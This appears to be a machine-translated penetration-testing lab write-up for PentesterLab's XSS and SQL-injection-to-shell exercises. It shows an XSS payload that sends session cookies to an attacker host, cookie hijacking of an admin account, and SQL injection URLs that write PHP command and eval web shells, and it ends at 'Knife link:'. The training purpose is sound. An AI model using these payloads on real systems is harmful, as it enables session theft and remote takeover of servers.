Please refer to the sql injection target machine attack process
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
Please refer to the attack process of xss target drone
https://pentesterlab.com/exercises/xss_and_mysql_file/course
experiment one
Connect it with a kitchen knife
Experiment 2
Open the web page on the machine:
Test whether there is an xss vulnerability.
It is found that there is a pop-up box after submitting:
further structure the content
<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script>
At the same time, open port 80 with nc on the 192.168.179.142 machine .
Log in to the admin account on the original machine, the password is p4ssw0rd
Get cookie information.
Copy the cookie and open the page where the comment is located on the 142 machine. And modify the value of the cookie to the value just copied.
Refresh the next page and find that you have logged into the page as admin.
After entering the management interface, it is found that there is a sql injection vulnerability in the blog editing interface.
The passwd file can be read, but the shadow file cannot be read. Let's try if we can create a file.
On the edit page, I found that there is an error message in the /var/www/classes directory,
When viewing the source code, I found that there is a css directory
After trying it out, the /var/www/css directory is writable.
So construct the statement:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
then open
http://192.168.179.130/css/s.php
show:
It means that the s.php file is successfully written to the /var/www/css directory, and the following will
<?php system($_GET['c']); ?>
Write in z.php and construct the url as:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
Access z.php and use uname -a to get system information. Commands can be executed remotely.
Write a sentence Trojan horse below to construct the url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
Knife link: